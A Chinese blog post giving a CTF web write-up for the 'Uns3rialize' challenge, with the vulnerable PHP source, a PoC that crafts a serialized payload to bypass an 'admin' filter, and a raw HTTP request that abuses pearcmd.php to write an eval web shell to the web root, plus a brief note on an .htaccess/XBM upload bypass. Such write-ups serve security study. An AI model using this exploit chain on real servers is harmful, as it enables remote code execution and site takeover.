第一届贺夏杯CTF-2025 web

OneZ3r0 Lv3
  2025-05-23 17:50:24 2025-05-23 17:50:24 创建   2025-07-29 18:03:58 2025-07-29 18:03:58 更新    

前言

好题!虽然打的人不多,但题目质量真不错啊

Uns3rialize

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
highlight_file(__FILE__);
class User
{
    public $username;
    public $value;
    public function exec($unser)
    {
        $ser = serialize($unser);
        if ($ser != $this->value) {
            $key1 = $unser[0];
            $key2 = $unser[1];
            include ($key1 . 'd1no_ctf' . $key2.'.php');
        }
    }
    public function __destruct()
    {
        if ($this->username == "admin") {
            $unser = unserialize($this->value);
            $this->exec($unser);
        }
    }
}
$ser = $_POST["user"];
if (strpos($ser, 'admin') !== false) {
    exit ("no way!!!!");
}
$user = unserialize($ser);
throw new Exception("noooooob!!!");

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php
class User
{
    public $username;
    public $value;
}

$user = new User();
$user->username = 'admin';

$evil = new User();
$v = serialize($evil);

$k1 = '../../../../';
$k2 = '../../../../../usr/local/lib/php/pearcmd';

$payload_in = serialize(array($v, $k1, $k2));
$payload_in = str_replace('i:1;','i:0;',$payload_in);
$payload_in = str_replace('i:2;','i:1;',$payload_in);

$user->value = $payload_in;

$payload_out = serialize(array($user, 0));
$payload_out = str_replace('s:5:"admin";','S:5:"\61dmin";',$payload_out);
$payload_out = str_replace('i:1;i:0;}','i:0;i:0;}',$payload_out);

var_dump($payload_out);

/* 
GET ?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=@eval($_POST['cmd'])?>+/var/www/html/onez3r0.php
POST user=$payload_out
*/

u1s1得burp 发包,不然<>被浏览器转义发出去就没用了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=@eval($_POST['cmd'])?>+/var/www/html/onez3r0.php HTTP/1.1
Host: 110.42.47.237:33440
Content-Length: 444
Cache-Control: max-age=0
Origin: http://110.42.47.237:33440
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://110.42.47.237:33440/?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/%3C?=phpinfo();?%3E+/var/www/html/onez3r0.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en;q=0.7
Connection: keep-alive

user=a:2:{i:0;O:4:"User":2:{s:8:"username";S:5:"\61dmin";s:5:"value";s:152:"a:3:{i:0;s:58:"O:4:"User":2:{s:8:"username";S:5:"\61dmin";s:5:"value";N;}";i:0;s:12:"../../../../";i:1;s:40:"../../../../../usr/local/lib/php/pearcmd";}";}i:0;i:9;}

还有个很好的文件上传,忘了叫啥了,反正就是 .htaccess的格式配合GIF89a文件头的

XBM是文本格式,可以写入.htaccess文件中绕过exif_imagetype()

https://blog.csdn.net/2401_86190146/article/details/146176497

  • 标题: 第一届贺夏杯CTF-2025 web
  • 作者: OneZ3r0
  • 创建于 : 2025-05-23 17:50:24
  • 更新于 : 2025-07-29 18:03:58
  • 链接: https://blog.onez3r0.top/2025/05/23/d1noctf-2025/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
目录
第一届贺夏杯CTF-2025 web
  1. 前言
  2. Uns3rialize